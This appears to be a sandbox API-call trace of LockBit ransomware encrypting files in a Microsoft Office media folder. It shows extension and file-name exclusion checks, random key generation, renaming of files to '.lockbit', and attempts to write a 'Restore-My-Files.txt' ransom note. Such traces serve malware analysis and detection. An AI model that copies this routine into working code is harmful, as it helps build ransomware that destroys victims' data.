lstrcmpiW (lpString1="autorun.inf", lpString2="BD18228_.WMF") returned -1 [0201.032] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18228_.WMF") returned 1 [0201.032] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18228_.WMF") returned 1 [0201.032] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.032] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF") returned=".WMF" [0201.032] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.032] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.032] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.033] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.033] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF.lockbit") returned 79 [0201.033] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18228_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0201.034] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.034] malloc (_Size=0x40068) returned 0x3df0008 [0201.034] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2180) returned 1 [0201.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.034] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.034] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.035] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0201.040] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.040] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.040] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.041] free (_Block=0x1fa2ed8) [0201.041] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18228_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.041] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.041] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3405b200, ftCreationTime.dwHighDateTime=0x1bdfe4c, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3405b200, ftLastWriteTime.dwHighDateTime=0x1bdfe4c, nFileSizeHigh=0x0, nFileSizeLow=0x7e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18229_.WMF", cAlternateFileName="")) returned 1 [0201.042] lstrcmpiW (lpString1=".", lpString2="BD18229_.WMF") returned -1 [0201.042] lstrcmpiW (lpString1="..", lpString2="BD18229_.WMF") returned -1 [0201.042] PathFindExtensionW (pszPath="BD18229_.WMF") returned=".WMF" [0201.042] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.042] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.043] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.043] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.085] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.085] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.085] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.085] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18229_.WMF") returned 1 [0201.085] lstrcmpiW (lpString1="ntldr", lpString2="BD18229_.WMF") returned 1 [0201.086] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18229_.WMF") returned 1 [0201.086] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18229_.WMF") returned 1 [0201.086] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18229_.WMF") returned -1 [0201.086] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18229_.WMF") returned 1 [0201.086] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18229_.WMF") returned 1 [0201.086] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.086] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF") returned=".WMF" [0201.086] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.086] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.086] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.087] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.087] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF.lockbit") returned 79 [0201.087] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18229_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0201.089] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.090] malloc (_Size=0x40068) returned 0x1ff1e60 [0201.090] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2020) returned 1 [0201.090] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0201.091] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.091] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.091] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0201.091] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0201.105] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.105] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.105] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.107] free (_Block=0x1fa2ed8) [0201.107] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18229_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.107] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.107] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0201.107] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef2cd000, ftCreationTime.dwHighDateTime=0x1bdcf1b, ftLastAccessTime.dwLowDateTime=0xbcc4be80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xef2cd000, ftLastWriteTime.dwHighDateTime=0x1bdcf1b, nFileSizeHigh=0x0, nFileSizeLow=0x724, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18230_.WMF", cAlternateFileName="")) returned 1 [0201.107] lstrcmpiW (lpString1=".", lpString2="BD18230_.WMF") returned -1 [0201.107] lstrcmpiW (lpString1="..", lpString2="BD18230_.WMF") returned -1 [0201.107] PathFindExtensionW (pszPath="BD18230_.WMF") returned=".WMF" [0201.107] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0201.107] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0201.108] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0201.108] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0201.109] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18230_.WMF") returned 1 [0201.109] lstrcmpiW (lpString1="ntldr", lpString2="BD18230_.WMF") returned 1 [0201.109] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18230_.WMF") returned 1 [0201.109] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18230_.WMF") returned 1 [0201.109] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18230_.WMF") returned -1 [0201.109] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18230_.WMF") returned 1 [0201.110] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18230_.WMF") returned 1 [0201.110] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0201.110] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF") returned=".WMF" [0201.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.110] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0201.110] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0201.111] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0201.111] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF.lockbit") returned 79 [0201.111] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18230_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0201.113] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0201.113] malloc (_Size=0x40068) returned 0x3df0008 [0201.113] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1828) returned 1 [0201.113] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0201.114] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0201.114] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0201.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0201.114] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0201.120] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0201.120] malloc (_Size=0xb4) returned 0x1fa2ed8 [0201.120] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0201.122] free (_Block=0x1fa2ed8) [0201.122] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18230_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0201.122] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0201.122] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, 